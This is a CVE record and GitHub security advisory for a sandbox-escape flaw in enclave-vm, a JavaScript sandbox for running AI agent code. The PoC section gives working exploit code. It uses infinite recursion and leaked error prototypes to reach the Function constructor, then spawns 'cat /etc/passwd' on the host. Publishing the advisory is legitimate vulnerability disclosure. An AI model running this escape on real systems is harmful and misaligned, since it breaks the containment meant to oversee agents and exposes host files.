Enclave is a secure JavaScript sandbox designed for safe AI agent code execution. Prior to 2.10.1, the existing layers of security in enclave-vm are insufficient: The AST sanitization can be bypassed with dynamic property accesses, the hardening of the error objects does not cover the peculiar behavior or the vm module and the function constructor access prevention can be side-stepped by leveraging host object references. This vulnerability is fixed in 2.10.1.
PUBLISHED5.2CWE-835
Enclave has a sandbox escape via infinite recursion and error objects
Problem type
Affected products
agentfront
enclave
< 2.10.1 - AFFECTED
References
https://github.com/agentfront/enclave/security/advisories/GHSA-x39w-8vm5-5m3p
https://github.com/agentfront/enclave/security/advisories/GHSA-x39w-8vm5-5m3p
https://github.com/agentfront/enclave/commit/2fcf5da81e7e2578ede6f94cae4f379165426dca
https://github.com/agentfront/enclave/commit/2fcf5da81e7e2578ede6f94cae4f379165426dca
https://www.staicu.org/publications/usenixSec2023-SandDriller.pdf
https://www.staicu.org/publications/usenixSec2023-SandDriller.pdf
GitHub Security Advisories
GHSA-x39w-8vm5-5m3p
Sandbox escape via infinite recursion and error objects
https://github.com/advisories/GHSA-x39w-8vm5-5m3pNote: The npm package has moved to @enclave-vm/core (formerly enclave-vm).
All fixed versions and guidance refer to @enclave-vm/core.
Summary
The existing layers of security in enclave-vm are insufficient: The AST sanitization can be bypassed with dynamic property accesses, the hardening of the error objects does not cover the peculiar behavior or the vm module and the function constructor access prevention can be side-stepped by leveraging host object references.
Details
There is a bug in Node.js (https://www.staicu.org/publications/usenixSec2023-SandDriller.pdf) that makes the vm module leak host references inside the vm module in case of infinite recursion. An attacker can exploit these to escape the sandbox.
PoC
The following on was tested on Node.js v24.12.0 and enclave-vm 2.7.0.
import { Enclave } from 'enclave-vm';
// Create enclave with a tool handler
const enclave = new Enclave({
timeout: 5000,
maxToolCalls: 10,
maxIterations: 1000,
toolHandler: async (toolName, args) => {
// Your tool execution logic
return { success: true, data: `Called ${toolName}` };
},
});
// Execute AgentScript code
const result = await enclave.run(`
let res = null, rootProt = null;
let a = () =>{
try {
a();
} catch (e) {
rootProt = e[["__proto__"]][["__proto__"]][["__proto__"]];
res=e.stack
}
}
a();
rootProt[["foo"]] = rootProt[["toString"]][["constructor"]]
rootProt[["foo"]]("let options = {file: 'cat', args: [null,'/etc/passwd'], envPairs: [], stdio: [{ type: 'pipe', readable: true, writable: false },{ type: 'pipe', readable: false, writable: true },{ type: 'pipe', readable: false, writable: true } ]}; console.log(process.binding('spawn_sync').spawn(options).output[1].toString())")();
`);
Impact
Sandbox escape and potential other escalations on FrontMCP/AgentFront/other Frontegg products.
github.com
https://github.com/agentfront/enclave/security/advisories/GHSA-x39w-8vm5-5m3p
github.com
https://github.com/agentfront/enclave/commit/2fcf5da81e7e2578ede6f94cae4f379165426dca
nvd.nist.gov
https://nvd.nist.gov/vuln/detail/CVE-2026-25533
staicu.org
https://www.staicu.org/publications/usenixSec2023-SandDriller.pdf
github.com
https://github.com/advisories/GHSA-x39w-8vm5-5m3p
JSON source
https://cveawg.mitre.org/api/cve/CVE-2026-25533Click to expand
{
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"cveMetadata": {
"cveId": "CVE-2026-25533",
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"dateUpdated": "2026-02-06T21:16:57.162Z",
"dateReserved": "2026-02-02T19:59:47.373Z",
"datePublished": "2026-02-06T21:16:57.162Z",
"state": "PUBLISHED"
},
"containers": {
"cna": {
"providerMetadata": {
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M",
"dateUpdated": "2026-02-06T21:16:57.162Z"
},
"title": "Enclave has a sandbox escape via infinite recursion and error objects",
"descriptions": [
{
"lang": "en",
"value": "Enclave is a secure JavaScript sandbox designed for safe AI agent code execution. Prior to 2.10.1, the existing layers of security in enclave-vm are insufficient: The AST sanitization can be bypassed with dynamic property accesses, the hardening of the error objects does not cover the peculiar behavior or the vm module and the function constructor access prevention can be side-stepped by leveraging host object references. This vulnerability is fixed in 2.10.1."
}
],
"affected": [
{
"vendor": "agentfront",
"product": "enclave",
"versions": [
{
"version": "< 2.10.1",
"status": "affected"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"lang": "en",
"description": "CWE-835: Loop with Unreachable Exit Condition ('Infinite Loop')",
"cweId": "CWE-835",
"type": "CWE"
}
]
}
],
"references": [
{
"url": "https://github.com/agentfront/enclave/security/advisories/GHSA-x39w-8vm5-5m3p",
"name": "https://github.com/agentfront/enclave/security/advisories/GHSA-x39w-8vm5-5m3p",
"tags": [
"x_refsource_CONFIRM"
]
},
{
"url": "https://github.com/agentfront/enclave/commit/2fcf5da81e7e2578ede6f94cae4f379165426dca",
"name": "https://github.com/agentfront/enclave/commit/2fcf5da81e7e2578ede6f94cae4f379165426dca",
"tags": [
"x_refsource_MISC"
]
},
{
"url": "https://www.staicu.org/publications/usenixSec2023-SandDriller.pdf",
"name": "https://www.staicu.org/publications/usenixSec2023-SandDriller.pdf",
"tags": [
"x_refsource_MISC"
]
}
],
"metrics": [
{}
]
}
}
}